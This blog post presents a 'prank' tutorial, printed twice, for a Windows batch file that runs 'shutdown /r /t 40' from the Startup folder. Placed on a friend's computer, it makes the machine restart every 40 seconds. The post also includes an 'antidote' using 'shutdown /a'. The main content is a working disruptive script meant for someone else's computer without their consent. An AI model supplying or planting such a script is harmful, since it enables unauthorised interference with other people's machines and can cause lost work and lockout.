Search This Blog
Pages
Header Ads Widget
Showing posts with label pranks. Show all posts
Showing posts with label pranks. Show all posts
Thursday, 24 August 2017
Friday, 18 August 2017
Prank on friends: Restart their computer continously......
Hello guys
This trick will help to prank on your friends...
Simply paste this coding in notepad and save this as *.bat (ex: shut.bat).
...................................................................................................
@echo off
echo message here
shutdown /r /t 40 /c "HAVE FUN"
....................................................................................................
And the last step paste this file in following directory:-
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Now your freinds computer will restart every time in span of 40 seconds.
ANTIDOTE:
Simply save this line in notepad as antidote.bat
..........................................
shutdown /a
..........................................
Then after restart, fastly click this file to abort one time restart
And then delete this file from startup folder or given directory
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
This trick will help to prank on your friends...
Simply paste this coding in notepad and save this as *.bat (ex: shut.bat).
...................................................................................................
@echo off
echo message here
shutdown /r /t 40 /c "HAVE FUN"
....................................................................................................
And the last step paste this file in following directory:-
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Now your freinds computer will restart every time in span of 40 seconds.
ANTIDOTE:
Simply save this line in notepad as antidote.bat
..........................................
shutdown /a
..........................................
Then after restart, fastly click this file to abort one time restart
And then delete this file from startup folder or given directory
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
WARNING:
Antidote file should be placed on desktop for quick action.
Try this trick at your own responsibility, this blog is not liable for any action caused by this trick.
For any help mail us or leave comment.
Like and Share if u enjoy it.....😎😎
Subscribe to:
Posts (Atom)